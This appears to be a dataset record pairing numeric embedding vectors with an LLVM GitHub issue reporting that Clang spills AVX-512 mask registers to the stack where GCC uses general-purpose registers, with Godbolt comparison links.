0.016865070909261703, -0.004433787893503904, 0.024536285549402237, 0.00341506814584136, -0.022230571135878563, -0.008439785800874233, 0.002782446565106511, 0.0030489088967442513, -0.001613275264389813, -0.003105101641267538, -0.015907982364296913, 0.009237360209226608, 0.00022352472296915948, 0.010448222979903221, -0.006460351869463921, 0.0037703511770814657, -0.004190890118479729, 0.01023070327937603, -0.011427064426243305, 0.02800210751593113, 0.005575769115239382, -0.01490738894790411, -0.005695405416190624, -0.006402346305549145, 0.0005891173495911062, -0.0011365433456376195, 0.0027208158280700445, 0.03341111168265343, 0.0031685451976954937, 0.007076659239828587, -0.0028223253320902586, -0.031438928097486496, -0.0019631204195320606, 0.023782216012477875, -0.02241908758878708, 0.0000051335346142877825, -0.016241513192653656, -0.012471161782741547, 0.0074319420382380486, 0.0023782216012477875, 0.035151273012161255, 0.010129193775355816, 0.0013214355567470193, -0.0019051149720326066, 0.006239206064492464, -0.010498978197574615, -0.0003595881862565875, -0.026218442246317863, 0.020127873867750168, 0.0026809372939169407, -0.011166039854288101, 0.0158354751765728, -0.004183639772236347, -0.0016431843396276236, -0.0012217387557029724, -0.006105068605393171, -0.00704040564596653, 0.0030489088967442513, -0.007424691691994667, 0.006565486546605825, -0.0030035923700779676, 0.019794343039393425, -0.004901456646621227, -0.018619734793901443, 0.02109946496784687, 0.004622305743396282, 0.015661459416151047, 0.0003847389598377049, 0.004354030359536409, 0.0005755223683081567, 0.006217454094439745, -0.012848196551203728, -0.0024217255413532257, -0.0013477192260324955, -0.01706808991730213, -0.011564827524125576, 0.005336496978998184, 0.007634961046278477, -0.004930459428578615, 0.006275459658354521, -0.02289763279259205, -0.004644057713449001, 0.018779249861836433, 0.017198601737618446, -0.006318963598459959, -0.0032084237318485975, -0.01424032635986805, -0.018590731546282768, 0.009012589231133461, -0.004096631426364183, -0.02917671762406826, -0.0053836265578866005, -0.004553424194455147, -0.014595609158277512, 0.015255420468747616, 0.019315799698233604, 0.008998088538646698, 0.006028936710208654, -0.017735151574015617, 0.007047656457871199, -0.03755849972367287, -0.005825917702168226, 0.0277410838752985, 0.0014564794255420566, 0.0017936357762664557, 0.007837980054318905, -0.002706314669921994, 0.0076712146401405334, 0.006514731794595718, -0.0009616208262741566, 0.0016196195501834154, -0.022129060700535774, -0.012877199798822403, 0.03767450898885727, 0.007018653675913811, 0.022883132100105286, 0.0073811872862279415, 0.010245203971862793, 0.005195108707994223, 0.0070549072697758675, 0.007518950384110212, 0.008070001378655434, -0.00450266944244504, 0.00805550068616867, -0.013544261455535889, -0.0004271100915502757, 0.0037195964250713587, -0.008026497438549995, 0.003063410287722945, -0.0070730336010456085, -0.0034803240559995174, 0.009201106615364552, 0.0062790848314762115, 0.005717157386243343, 0.004005997907370329, 0.0005419880035333335, -0.004480917472392321, -0.00719992071390152, -0.000936243450269103, 0.0016223386628553271, 0.003362500574439764, 0.015501943416893482, 0.007058532442897558, 0.00933161936700344, 0.008019247092306614, 0.00008451568282907829, 0.009766659699380398, -0.005082723218947649, -0.013776282779872417, 0.0013495319290086627, -0.023448683321475983, -0.008367279544472694, 0.011064530350267887, -0.003369751386344433, 0.007953991182148457, 0.010150945745408535, -0.008019247092306614, 0.015371431596577168, -0.003500263439491391, 0.0017437874339520931, 0.00034010197850875556, 0.004035000689327717, -0.0012289894511923194, 0.0004953117459081113, -0.013268736191093922, -0.009962428361177444, -0.0029002700466662645, -0.007062157616019249, 0.006648869253695011, -0.0035455801989883184, 0.012318897061049938, 0.003304495243355632, 0.005909300409257412, -0.010672993957996368, 0.0028078239411115646, 0.00933161936700344, -0.038718607276678085, -0.00977391004562378, -0.001824451144784689, -0.006369718350470066, 0.02566738985478878, -0.008374529890716076, 0.0020755059085786343, -0.007149165961891413, 0.019170785322785378, 0.028712674975395203, 0.021926041692495346, 0.011579328216612339, -0.010375716723501682, -0.007261551450937986, -0.007634961046278477, 0.001644996926188469, -0.00314860581420362, -0.0260299239307642, -0.0055612679570913315, -0.025957418605685234, -0.001790010486729443, -0.0021752025932073593, -0.019199788570404053, 0.008780567906796932, 0.004194515757262707, 0.008004745468497276, 0.0005002965917810798, -0.0017138783587142825, -0.022042052820324898, -0.009179354645311832, -0.004364906344562769, -0.01211587805300951, -0.01759013906121254, 0.010201700031757355, 0.0011447003344073892, -0.008831322193145752, 0.011869355104863644, -0.005350998602807522, 0.033933158963918686, 0.013188978657126427, 0.017097093164920807, -0.0014836693881079555, -0.004303275607526302, -0.01854722760617733, -0.002231395337730646, -0.01134730689227581, 0.01099927444010973, 0.014965393580496311, 0.003271867288276553, -0.008708060719072819, 0.01169533934444189, 0.019997362047433853, -0.0026990638580173254, 0.006579987704753876, -0.005213235504925251, -0.011775096878409386, 0.024463778361678123, 0.005031968466937542, -0.018184693530201912, 0.013087469153106213, -0.0068953922018408775, -0.0037522243801504374, -0.014044557698071003, 0.015269922092556953, -0.005216860678046942, -0.01097752247005701, 0.01461011078208685, -0.01057873573154211, 0.00048171673552133143, 0.0010812570108100772, 0.0115068219602108, 0.010426471009850502, -0.008040999062359333, -0.00807725265622139, -0.003933491185307503, -0.004926833789795637, 0.01007118821144104, -0.007627710234373808, -0.0016286829486489296, 0.005706281401216984, -0.008744314312934875, 0.013174477033317089, 0.011216795071959496, -0.0026138685643672943, -0.011970864608883858, 0.010107441805303097, 0.019054774194955826, -0.015342429280281067, -0.005945554003119469, -0.001739255734719336, -0.010216201655566692, 0.005992683116346598, -0.01563245616853237, -0.0058404188603162766, -0.004731065593659878, 0.029321730136871338, -0.006007184740155935, 0.006949772126972675, -0.007801726460456848, -0.037065453827381134, -0.012210137210786343, -0.0017736965091899037, 0.004038626328110695, 0.008679058402776718, -0.0038899872452020645, 0.008708060719072819, -0.010897764936089516, 0.0018579855095595121, -0.012369652278721333, -0.001014188164845109, 0.003926240839064121, -0.010426471009850502, -0.01243490818887949, -0.0006575456354767084, -0.021026957780122757, 0.018793750554323196, 0.011448816396296024, 0.008309273980557919, -0.04199591279029846, -0.02939423732459545, 0.01748862862586975, -0.006833761464804411, -0.017735151574015617, -0.0181121863424778, 0.022825125604867935, -0.006949772126972675, -0.0067467535845935345, -0.0053800009191036224, 0.022332079708576202, -0.011180541478097439, 0.0057896641083061695, -0.016879571601748466, 0.0086863087490201, -0.010549732483923435, 0.029640760272741318, -0.005452507641166449, -0.0011537637328729033, 0.02018588036298752, 0.0019431810360401869, 0.002619306556880474, -0.008577548898756504, -0.021432995796203613, 0.004238019697368145, 0.013283236883580685, 0.013094719499349594, -0.010701997205615044, -0.01944631151854992, -0.0026990638580173254, 0.030046798288822174, 0.00719992071390152, 0.001872486900538206, -0.008903829380869865, 0.0010640366235747933, 0.0017265670467168093, -0.014494099654257298, -0.0014528540195897222, 0.0036108363419771194, -0.004941335413604975, -0.017764154821634293, 0.00810625497251749, 0.005068222060799599, 0.0166330486536026, -0.019939357414841652, -0.02269461378455162, -0.006373343523591757, -0.012166633270680904, 0.010172697715461254, -0.00970140378922224, 0.010433721356093884, -0.012768439017236233, 0.020591918379068375, -0.017343616113066673, -0.005670028273016214, 0.00018183334032073617, -0.0007314118556678295, -0.022303076460957527, 0.023042645305395126, -0.007576955948024988, -0.011274799704551697, 0.030539844185113907, 0.012891700491309166, -0.006576362531632185, -0.013420999981462955, -0.007392063271254301, -0.005068222060799599, 0.0017211290542036295, -0.00861380249261856, -0.013943049125373363, 0.01060048770159483, -0.002967338776215911, -0.01241315621882677, -0.0013613143237307668, -0.007094786036759615, -0.007932239212095737, 0.011405312456190586, 0.010506228543817997, -0.027987606823444366, 0.02837914414703846, 0.0011755157029256225, 0.0031304790172725916, -0.008396281860768795, -0.01262342557311058, -0.011448816396296024, -0.02285412885248661, 0.028567660599946976, -0.003077911678701639, -0.008563047274947166, 0.009636147879064083, 0.0014637301210314035, 0.009650648571550846, -0.000334210810251534, -0.006043437868356705, 0.0037485992070287466, 0.008367279544472694, -0.007678464986383915, -0.000017022093743435107, 0.0025558630004525185, -0.005720783025026321, -0.0038537338841706514, 0.025261353701353073, -0.005811416078358889, 0.00505009526386857, -0.004970337729901075, 0.006579987704753876, -0.015864478424191475, -0.008744314312934875, 0.0118766063824296, 0.002457978902384639, 0.010020432993769646, -0.012543668039143085, -0.003454946679994464, 0.01998286135494709, -0.006398721132427454, -0.025362862274050713, -0.000030333880204125308, 0.007221672683954239, -0.010643991641700268, -0.005180607549846172, -0.022680113092064857, 0.020635422319173813, -0.0004903269000351429, -0.02024388499557972, 0.0066669960506260395, 0.00034100832999683917, 0.022404586896300316, -0.011361808516085148, 0.005354623775929213, 0.0013014961732551455, 0.019156284630298615, -0.007185419090092182, -0.0175466351211071, 0.007062157616019249, -0.006804758682847023, 0.007297804579138756, 0.03561531752347946, 0.02652296982705593, -0.010520730167627335, 0.007134664338082075, -0.010527980513870716, 0.022651109844446182, -0.006514731794595718, 0.0037159710191190243, 0.02104146033525467, -0.006982400547713041, -0.005296618212014437, 0.00026600915589369833, -0.017039086669683456, -0.007087535224854946, 0.012195635586977005, 0.005909300409257412, 0.009462131187319756, 0.008164260536432266, -0.004857952240854502, -0.002108133863657713, 0.016807066276669502, 0.028785180300474167, -0.004901456646621227, -0.0010005931835621595, 0.0061304462142288685, -0.002976402174681425, -0.005180607549846172, -0.008853074163198471, 0.011644584126770496, 0.026015423238277435, -0.0029292728286236525, 0.004988464526832104, -0.0046368069015443325, 0.009607144631445408, -0.010426471009850502, 0.0032174871303141117, -0.004923208616673946, 0.005169731564819813, 0.005724408198148012, 0.01950431615114212, 0.011782347224652767, -0.007185419090092182, -0.022172564640641212, 0.0026283697225153446, 0.008954583667218685, -0.020852942019701004, 0.005470634438097477, 0.01998286135494709, 0.010361215099692345, 0.0067467535845935345, -0.008751565590500832, 0.010890514589846134, 0.013072967529296875, -0.0076422118581831455, 0.0038899872452020645, -0.028770679607987404, -0.018242700025439262, -0.012797442264854908, -0.009998681023716927, -0.007634961046278477, 0.00296371360309422, 0.004589677322655916, 0.000779900758061558, 0.00009680784569354728, 0.012442158535122871, -0.01176784560084343, 0.029611758887767792, 0.006478478200733662, 0.018532726913690567, 0.011289301328361034, -0.0008505948353558779, 0.01986685022711754, 0.009302616119384766, 0.01535692997276783, 0.0019178036600351334, -0.01155757624655962, 0.0013903169892728329, -0.007127413991838694, -0.0010694746160879731, -0.010085689835250378, -0.00430690124630928, -0.003141355002298951, 0.017300112172961235, 0.031061893329024315, 0.016241513192653656, 0.007504448760300875, 0.001955869607627392, 0.02444927766919136, 0.008925581350922585, -0.009694152511656284, -0.0007771817618049681, -0.026827499270439148, -0.006648869253695011, 0.0028005733620375395, 0.012652428820729256, -0.02642146125435829, -0.007518950384110212, 0.011253047734498978, 0.0205629151314497, -0.020693426951766014, 0.02109946496784687, 0.014349086210131645, -0.003092413069680333, -0.014088062569499016, -0.0034730734769254923, -0.008193262852728367, -0.028031110763549805, -0.015269922092556953, -0.011811350472271442, 0.016241513192653656, 0.02895919792354107, -0.03703644871711731, 0.02746555767953396, -0.00398424593731761, 0.02588491141796112, -0.02035989612340927, 0.011738843284547329, 0.016749059781432152, -0.025464370846748352, -0.006725001148879528, -0.02652296982705593, -0.004970337729901075, 0.01896776631474495, 0.008940082974731922, -0.013080217875540257, 0.00775822252035141, -0.0074609448201954365, -0.0082875220105052, 0.0005306588136591017, 0.0023419682402163744, 0.005082723218947649, -0.00842528510838747, -0.017996177077293396, 0.008737063966691494, -0.012137630954384804, -0.006021685898303986, -0.018300704658031464, -0.028263133019208908, -0.002494232263416052, 0.024550786241889, 0.005981807131320238, 0.014820380136370659, -0.037384480237960815, -0.02221606858074665, 0.019417308270931244, -0.01625601388514042, 0.0016431843396276236, -0.0031594817992299795, 0.035412296652793884, -0.019591324031352997, 0.005274866241961718, -0.015443938784301281, 0.013812536373734474, 0.013529759831726551, -0.012985959649085999, -0.0010740063153207302, 0.008004745468497276, -0.014385339803993702, 0.003250115318223834, 0.013718278147280216, 0.006572737358510494, 0.0003285462153144181, 0.006500230636447668, 0.002273086691275239, 0.002931085415184498, -0.0041002570651471615, -0.0007237080135382712, 0.013986553065478802, -0.01848922297358513, -0.0021897039841860533, 0.004984839353710413, -0.018953265622258186, -0.0017746028024703264, -0.010665743611752987, -0.0013422812335193157, 0.03877661004662514, -0.012340649031102657, -0.0063588423654437065, -0.016705555841326714, 0.018054181709885597, 0.00922285858541727, 0.031206905841827393, 0.0070222788490355015, -0.01621250994503498, -0.004723814781755209, 0.026058927178382874, -0.0071237883530557156, 0.01283369492739439, -0.008360028266906738, 0.0006978774908930063, -0.003289993852376938, 0.014407091774046421, 0.003514764830470085, -0.011456066742539406, -0.009367872960865498, 0.018561728298664093, -0.014465097337961197, -0.03346911817789078, -0.011920110322535038, 0.019431808963418007, -0.000982466503046453, -0.02020038105547428, 0.009947926737368107, -0.007170917931944132, 0.01097027212381363, -0.01986685022711754, -0.009041592478752136, 0.01753213256597519, 0.010223452001810074, 0.012195635586977005, -0.032018981873989105, -0.006964273750782013, 0.011949112638831139, -0.001870674197562039, 0.014443345367908478, -0.01222463883459568, 0.008033748716115952, 0.005706281401216984, -0.02907520718872547, -0.004836200270801783, -0.017198601737618446, -0.00879506953060627, -0.02907520718872547, 0.00807725265622139, -0.0004583786358125508, 0.0014274767599999905, 0.016009490936994553, 0.002515984233468771, 0.0014646364143118262, 0.01780765876173973, -0.0019159909570589662, -0.0018597982125356793, 0.011427064426243305, -0.013283236883580685, -0.004912332631647587, 0.012492913752794266, -0.006540108937770128, -0.021215476095676422, 0.02460879273712635, -0.028495153412222862, -0.012101377360522747, -0.016140002757310867, -0.0002186531783081591, 0.015472941100597382, -0.019518818706274033, 0.0035310788080096245, -0.0032446773257106543, 0.0059999339282512665, 0.020635422319173813, -0.00991167314350605, 0.016807066276669502, 0.006989650893956423, -0.007290554232895374, 0.005470634438097477, -0.022129060700535774, 0.011289301328361034, 0.00812800694257021, 0.002273086691275239, 0.013196229003369808, -0.017358116805553436, 0.0037340978160500526, 0.0014601047150790691, 0.007794476114213467, 0.028031110763549805, 0.010636740364134312, -0.002374596195295453, 0.021534506231546402, 0.006594489328563213, 0.010643991641700268, 0.008766066282987595, -0.003175795776769519, 0.009244611486792564, -0.00826577004045248, 0.011818600818514824, 0.01944631151854992, -0.0008845824049785733, 0.001516297459602356, 0.012369652278721333, 0.006808384321630001, -0.00994067545980215, 0.002461604308336973, 0.0003926693752873689, 0.011920110322535038, 0.008236766792833805, 0.0007114725303836167, 0.02513084001839161, -0.0034803240559995174, -0.018851755186915398, -0.016502536833286285, -0.0011410750448703766, -0.017445124685764313, 0.010194449685513973, -0.009411376900970936, 0.023506689816713333, 0.018576230853796005, -0.0002850421878974885, -0.005140728782862425, -0.008722562342882156, 0.007352184969931841, -0.010382967069745064, 0.002706314669921994, -0.017619140446186066, 0.002144387224689126, -0.00916485395282507, -0.005343747790902853, 0.004230768885463476, -0.00003259971708757803, -0.00043345443555153906, 0.005108100827783346, 0.0006067908834666014, 0.003255553310737014, -0.00505009526386857, -0.009070594795048237, 0.01118779182434082, -0.014414342120289803, 0.00540900370106101, -0.006347966380417347, 0.028785180300474167, -0.032976072281599045, 0.040690790861845016, 0.0004019593179691583, -0.007613209076225758, 0.0020410651341080666, -0.010955770500004292, 0.005974556319415569, 0.01312372274696827, -0.014327334240078926, -0.019895853474736214, -0.00021355504577513784, -0.016241513192653656, 0.0034386327024549246, 0.021723022684454918, 0.00027122057508677244, -0.0033896907698363066, -0.0007826197543181479, -0.0012697745114564896, 0.010404719039797783, 0.016357524320483208, 0.010484476573765278, 0.004074879456311464, 0.0027407552115619183, -0.02407224290072918, -0.00013538369967136532, -0.00048624840565025806, 0.008751565590500832, -0.00269725127145648, 0.004216267727315426, -0.01673455908894539, 0.011448816396296024, -0.021549006924033165, -0.011572077870368958, 0.010868762619793415, -0.034571219235658646, 0.006674246862530708, 0.02082393877208233, 0.002847702708095312, -0.00387186068110168, 0.007218047510832548, 0.0042488956823945045, -0.011173291131854057, -0.02827763371169567, 0.014950892888009548, -0.012391404248774052, 0.016023991629481316, 0.004136510193347931, -0.010665743611752987, -0.007845230400562286, -0.0025939291808754206, -0.024362269788980484, -0.0030851622577756643, 0.01479862816631794, -0.008084503002464771, 0.009621646255254745, 0.027349546551704407, 0.0213024839758873, -0.01827170141041279, -0.011912859976291656, -0.019634827971458435, 0.0037812271621078253, 0.0019159909570589662, -0.018518224358558655, -0.009396875277161598, 0.00884582381695509, -0.011383560486137867, 0.010303209535777569, -0.0021480126306414604, 0.0230716485530138, -0.0013304989552125335, -0.0011863918043673038, 0.007297804579138756, 0.0041183833964169025, 0.002898457460105419, 0.000735037203412503, 0.020432403311133385, 0.01827170141041279, 0.016285017132759094, 0.00940412562340498, 0.0005805072141811252, -0.020316392183303833, 0.026073427870869637, 0.0026628104969859123, 0.007033155299723148, 0.024434775114059448, 0.017677146941423416, -0.0025576758198440075, -0.004977588541805744, -0.006271834019571543, -0.019808845594525337, 0.008961834944784641, -0.0012190197594463825, 0.012021619826555252, 0.009679651819169521, 0.0031794211827218533, -0.004963087383657694, -0.013072967529296875, -0.0033008698374032974, 0.013754530809819698, -0.009918923489749432, -0.0198813509196043, 0.0032791178673505783, -0.008911079727113247, -0.02492782101035118, -0.012710433453321457, 0.014494099654257298, 0.03283105790615082, -0.01020895130932331, 0.002753444015979767, -0.018199194222688675, -0.002880330663174391, 0.03140992671251297, 0.00040059981984086335, -0.003929866012185812, -0.008729812689125538, 0.00387186068110168, -0.01134730689227581, -0.02004086598753929, 0.022723617032170296, 0.005467009264975786, -0.015864478424191475, -0.01384153962135315, 0.020693426951766014, -0.006521982606500387, 0.009157602675259113, 0.003648902289569378, 0.008367279544472694, 0.014892887324094772, -0.01400830503553152, 0.015545448288321495, 0.007620459888130426, 0.004103882238268852, -0.013304988853633404, -0.0013930359855294228, -0.0031812337692826986, -0.011782347224652767, 0.010897764936089516, -0.01972183771431446, -0.005760661326348782, -0.005318370182067156, 0.017619140446186066, -0.025855908170342445, 0.022767120972275734, -0.004908706992864609, -0.009273613803088665, 0.0024833562783896923, -0.012906202115118504, -0.011651835404336452, 0.009686902165412903, 0.01928679645061493, 0.008381780236959457, -0.01690857484936714, -0.015400434844195843, -0.00006859818677185103, 0.005477885250002146, 0.0028658295050263405, -0.000397880794480443, 0.011035528033971786, 0.010694745928049088, -0.01651703752577305, -0.018851755186915398, -0.001416600658558309, 0.02199854888021946, 0.01280469261109829, -0.013217980973422527, -0.015603452920913696, 0.007051281630992889, -0.005452507641166449, -0.0008197794668376446, 0.0045099202543497086, -0.015719464048743248, -0.0060796914622187614, 0.023840220645070076, 0.0006330746109597385, 0.031699951738119125, -0.014341835863888264, -0.005427130497992039, -0.0166330486536026, 0.004241644870489836, 0.01796717382967472, 0.004364906344562769, -0.011941862292587757, -0.014225824736058712, -0.007700217422097921, -0.018315205350518227, -0.0012652428122237325, -0.00595280434936285, -0.005365499760955572, -0.034832242876291275, 0.014726121909916401, 0.0122753931209445, 0.028814183548092842, -0.00270268926396966, -0.013246984221041203, 0.02370970882475376, 0.007239799480885267, -0.0037304724100977182, -0.0061014434322714806, 0.003184859175235033, -0.029307229444384575, -0.014385339803993702, -0.006362467538565397, -0.023564694449305534, -0.024202754721045494, -0.0205629151314497, 0.01960582658648491, -0.008026497438549995, -0.01706808991730213, -0.007377562113106251, 0.0016903136856853962, -0.017981674522161484, -0.00011057280062232167, -0.005042844917625189, 0.00863555446267128, 0.008026497438549995, -0.014979895204305649, 0.004760068375617266, 0.02243359014391899, 0.024144748225808144, 0.0173726174980402, -0.009947926737368107, 0.012978709302842617, -0.0031939225737005472, -0.0021969545632600784, 0.025377362966537476, -0.00488695502281189, 0.0030380329117178917, 0.004905081819742918, -0.005068222060799599, -0.007939489558339119, -0.009708654135465622, 0.03532528877258301, -0.006416847463697195, 0.0024072241503745317, -0.0007576955831609666, 0.0039189900271594524, -0.011898358352482319, 0.003161294385790825, 0.009454880841076374, 0.009715904481709003, -0.016401028260588646, -0.017662644386291504, 0.010056686587631702, -0.006550985388457775, 0.01445059571415186, 0.05426405370235443, 0.008345527574419975, 0.0005098131368868053, 0.008157010190188885, -0.015690460801124573, -0.0013576889177784324, 0.0019667455926537514, 0.008990837261080742, -0.010643991641700268, 0.005423505324870348, -0.00488695502281189, 0.006837386637926102, 0.00025128122069872916, -0.011738843284547329, -0.007000526878982782, -0.006851888261735439, -0.006822885479778051, -0.002423538127914071, -0.01690857484936714, -0.010723749175667763, 0.0010540669318288565, -0.005601146724075079, 0.02608793042600155, -0.0021280732471495867, 0.006819260306656361, 0.004064003471285105, -0.0009616208262741566, -0.026232942938804626, 0.003433194709941745, -0.032860059291124344, -0.008650056086480618, -0.004122009035199881, 0.016299517825245857, 0.012500164099037647, 0.015748467296361923, -0.010295959189534187, 0.0005098131368868053, 0.024144748225808144, -0.01500889752060175, -0.009824665263295174, -0.012927954085171223, 0.0028603915125131607, -0.030858874320983887, -0.004082130268216133, 0.00048216991126537323, -0.008592050522565842, 0.014813129790127277, 0.012152131646871567, 0.008838573470711708, 0.023999735713005066, 0.020809438079595566, -0.01743062399327755, -0.0012933391844853759, -0.00035890843719244003, 0.02020038105547428, -0.018619734793901443, -0.01280469261109829, -0.01790916733443737, 0.0055612679570913315, 0.0024688548874109983, 0.006880891043692827, -0.010136444121599197, 0.0031177904456853867, 0.013950299471616745, -0.021128468215465546, 0.006750378757715225, 0.004774569533765316, 0.011862104758620262, -0.0073340581730008125, 0.02716103009879589, 0.0008324681548401713, -0.009266363456845284, -0.0004629103059414774, -0.012616175226867199, 0.010832509025931358, -0.02481181174516678, 0.013268736191093922, -0.02253509871661663, -0.012094126082956791, -0.011543075554072857, 0.010332212783396244, -0.003212049137800932, 0.005666402634233236, -0.009665150195360184, -0.010549732483923435, 0.011282050982117653, -0.02592841535806656, -0.018576230853796005, -0.006659745238721371, 0.003900863230228424, 0.01790916733443737, 0.004451914690434933, -0.005731659010052681, 0.0126451775431633, -0.01009294018149376, -0.012971458025276661, -0.0020610045175999403, 0.018735745921730995, 0.0021117592696100473, 0.010607738047838211, 0.025710895657539368, 0.003879111260175705, -0.020156877115368843, -0.0038682352751493454, 0.0051733567379415035, 0.007634961046278477, -0.007845230400562286, -0.004089381080120802, -0.0000446086487499997, -0.0036706544924527407, 0.024304263293743134, 0.015197415836155415, -0.016995582729578018, 0.0025504250079393387, 0.021287983283400536, -0.011804099194705486, 0.004016874358057976, 0.0014945454895496368, 0.014037307351827621, 0.008584799244999886, -0.014225824736058712, 0.0034168807324022055, 0.025841407477855682, -0.007080284412950277, 0.00004044517481816001, 0.01463911309838295, -0.015269922092556953, -0.0018851755885407329, -0.008809570223093033, 0.01174609363079071, 0.0023673453833907843, 0.0005030155880376697, 0.025217847898602486, 0.005659152287989855, -0.003612648928537965, 0.00433227838948369, -0.00685551343485713, 0.023825719952583313, 0.007341308984905481, -0.007598707918077707, 0.0054343813098967075, 0.06879440695047379, -0.008816821500658989, -0.0017655394040048122, -0.030742863193154335, 0.01461736112833023, 0.0020591916982084513, 0.014827631413936615, -0.005728033371269703, 0.0019703709986060858, -0.007750971708446741, 0.02041790261864662, 0.02720453403890133, -0.0016087435651570559, -0.0026791244745254517, 0.017401620745658875, 0.020345395430922508, 0.011166039854288101, 0.008903829380869865, -0.007830729708075523, 0.009186605922877789, -0.0025522378273308277, 0.0035528310108929873, -0.00017979409312829375, 0.014182320795953274, -0.0020755059085786343, 0.01667655259370804, -0.012637927196919918, 0.011427064426243305, -0.004611429292708635, -0.02259310521185398, -0.03341111168265343, -0.012362401001155376, 0.00020913666230626404, 0.028727175667881966, -0.0061014434322714806, 0.0007359435549005866, 0.01131830457597971, -0.00505009526386857, 0.005590270739048719, 0.03219299763441086, 0.03158394247293472, -0.014581108465790749, 0.024695800617337227, 0.02800210751593113, -0.007065783254802227, -0.008766066282987595, -0.023347174748778343, 0.01458835881203413, 0.016444532200694084, -0.006224704906344414, -0.026958011090755463, 0.013638520613312721, 0.0042017665691673756, -0.014682617969810963, 0.01992485672235489, 0.011035528033971786, -0.01445059571415186, 0.025319358333945274, -0.0008877545478753746, 0.0004214454966131598, -0.019301297143101692, 0.005187858361750841, -0.012376902624964714 ]
null
null
null
null
null
null
null
null
null
[ "llvm", "llvm-project" ]
I hit some cases where LLVM spills mask registers to the stack in memory-bound code, where extra loads and stores to the stack are quite expensive. Some of these spills may be avoidable through better scheduling, but I think improving the performance of the spills (when unavoidable) would also be useful. I noticed that GCC spills these registers to GPRs -- could LLVM do the same? Here is a minimal example: * clang spills mask registers to the stack: https://godbolt.org/z/e9nGb6z8s * gcc spills mask registers to GPRs: https://godbolt.org/z/h46cdje7a Here is a more realistic scenario, where better scheduling could theoretically eliminate the spills (but doesn't): https://godbolt.org/z/Pz1dsrh53 For the realistic scenario, I also observed that GCC spills to GPRs, while LLVM spills to the stack. I chatted offline with @MatzeB, who indicated that this would probably require a lot of work in the register allocator. I understand if the gains aren't large enough to justify this work. But I still thought it might be useful to share this data point with the community.
AVX-512 mask registers spill to stack when GPRs are available
https://api.github.com/repos/llvm/llvm-project/issues/94025/comments
1
2024-05-31T19:35:18
2024-05-31T19:38:08Z
https://github.com/llvm/llvm-project/issues/94025
2,328,475,122
94,025
false
This is a GitHub Issue repo:llvm-project owner:llvm Title : AVX-512 mask registers spill to stack when GPRs are available Issue date: --- start body --- I hit some cases where LLVM spills mask registers to the stack in memory-bound code, where extra loads and stores to the stack are quite expensive. Some of these spills may be avoidable through better scheduling, but I think improving the performance of the spills (when unavoidable) would also be useful. I noticed that GCC spills these registers to GPRs -- could LLVM do the same? Here is a minimal example: * clang spills mask registers to the stack: https://godbolt.org/z/e9nGb6z8s * gcc spills mask registers to GPRs: https://godbolt.org/z/h46cdje7a Here is a more realistic scenario, where better scheduling could theoretically eliminate the spills (but doesn't): https://godbolt.org/z/Pz1dsrh53 For the realistic scenario, I also observed that GCC spills to GPRs, while LLVM spills to the stack. I chatted offline with @MatzeB, who indicated that this would probably require a lot of work in the register allocator. I understand if the gains aren't large enough to justify this work. But I still thought it might be useful to share this data point with the community. --- end body ---
1,263
[ -0.01929205097258091, 0.030957631766796112, -0.030691901221871376, 0.006829279940575361, 0.03608623519539833, 0.02714439481496811, -0.02176334708929062, 0.03042617067694664, -0.0008669465314596891, 0.016541738063097, -0.02835346944630146, 0.03350864723324776, 0.015651540830731392, 0.007965278811752796, -0.0017189456848427653, 0.0033299382776021957, 0.002228816505521536, 0.016010276973247528, 0.0040656803175807, -0.037308596074581146, 0.020833289250731468, 0.009506517089903355, -0.037149157375097275, 0.024872398003935814, 0.013392829336225986, 0.0036737273912876844, -0.020168963819742203, 0.014163448475301266, -0.011499498039484024, 0.009944972582161427, 0.004344697576016188, 0.027317119762301445, -0.042809221893548965, 0.02248082123696804, -0.006620016880333424, 0.015120078809559345, 0.015226371586322784, 0.04873501881957054, -0.006533654406666756, 0.005108673591166735, 0.0045838551595807076, -0.022401101887226105, -0.01870744489133358, 0.009652669541537762, -0.015837552025914192, 0.0028599270153790712, 0.026240911334753036, 0.025829028338193893, -0.06898370385169983, -0.022055651992559433, -0.00581286009401083, -0.05141889676451683, 0.016395587474107742, -0.06090548634529114, 0.008988342247903347, -0.028698919340968132, -0.014362746849656105, 0.018587864935398102, 0.011413135565817356, -0.009566307067871094, -0.039195284247398376, 0.011652292683720589, -0.018587864935398102, -0.002074360614642501, 0.0007320051663555205, -0.02210879698395729, -0.04796439781785011, 0.007858986966311932, -0.008310728706419468, -0.001888349070213735, -0.018162695690989494, -0.012223614379763603, 0.0239290539175272, 0.009101278148591518, 0.0031954122241586447, -0.011944596655666828, 0.050754573196172714, 0.023942340165376663, -0.02532413974404335, -0.026506641879677773, -0.017338931560516357, 0.01494735386222601, -0.004357984289526939, -0.007819127291440964, 0.07674303650856018, -0.013565554283559322, 0.010582726448774338, -0.03414640203118324, -0.047167208045721054, -0.03045274317264557, -0.04063022881746292, 0.007566682994365692, 0.0013477531028911471, -0.01303409319370985, -0.022281521931290627, 0.021231885999441147, -0.032206565141677856, -0.003783341497182846, -0.022892704233527184, -0.0013228408060967922, -0.020979441702365875, 0.0022985709365457296, -0.005105352029204369, 0.016714463010430336, 0.038637250661849976, 0.023796187713742256, -0.0184948593378067, -0.043739281594753265, 0.03459814190864563, 0.07073752582073212, 0.039009273052215576, 0.0026573073118925095, 0.004484206438064575, -0.014508898369967937, -0.02872549369931221, 0.005341188050806522, -0.025550011545419693, -0.0001287133345613256, -0.008755828253924847, -0.05080771818757057, -0.0030542428139597178, -0.014136875048279762, 0.001943156006745994, -0.027635997161269188, -0.009340435266494751, 0.020514413714408875, 0.00750689348205924, -0.021218599751591682, -0.030107293277978897, -0.005852719768881798, -0.019345197826623917, -0.03794635087251663, 0.0028815176337957382, -0.05365103483200073, -0.026041612029075623, -0.010290422476828098, 0.00904148817062378, 0.03422611951828003, -0.004600463435053825, -0.009964902885258198, -0.027715716511011124, -0.02034168876707554, 0.02968212403357029, 0.012422911822795868, -0.0017505012219771743, -0.0360596626996994, -0.032950613647699356, 0.05330558493733406, -0.019810225814580917, -0.0010421627666801214, 0.023942340165376663, -0.012808221392333508, -0.001994641264900565, 0.004095574840903282, 0.008802331052720547, 0.004424416925758123, -0.013911004178225994, -0.028672346845269203, 0.016860615462064743, -0.030293304473161697, -0.013100525364279747, -0.01510679256170988, -0.02949611283838749, 0.011665579862892628, 0.007619828917086124, -0.023384304717183113, 0.03172824904322624, 0.016714463010430336, 0.004377914126962423, 0.023490596562623978, -0.022374527528882027, 0.02504512295126915, -0.009865254163742065, 0.01185823418200016, -0.005583667196333408, 0.031435947865247726, -0.007480320520699024, 0.0056966026313602924, 0.0023417521733790636, -0.06409425288438797, 